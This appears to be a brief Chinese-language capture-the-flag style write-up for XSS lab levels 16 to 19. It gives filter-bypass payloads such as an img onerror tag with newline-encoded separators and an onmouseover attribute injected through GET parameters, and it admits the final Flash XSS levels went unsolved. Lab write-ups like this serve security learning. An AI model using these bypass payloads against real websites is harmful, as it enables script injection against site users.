Less16
过滤了script、/、空格
只能使用不用/闭合的标签,例如<img>
空格用回车绕过
test payload
<img
scr=1
onerror=alert(1)>
payload
?keyword=<img%0asrc=1%0aonerror=alert(1)>
Less17
利用get请求在embed标签中插入一个事件,比如onclick、onmouseover等
payload
?arg01=a&arg02=b%20onmouseover=alert(1)
Less18
本题做法与上题一样
payload
?arg01=a&arg02=b%20onmouseover=alert(1)
Less19
源码中用了两个htmlspecialchars转义了输入
而且还用双引号闭合了
这么一来,就无法闭合双引号了
最后两题都为flash xss,不会…
参考大佬文章
https://www.zhaosimeng.cn/writeup/119.html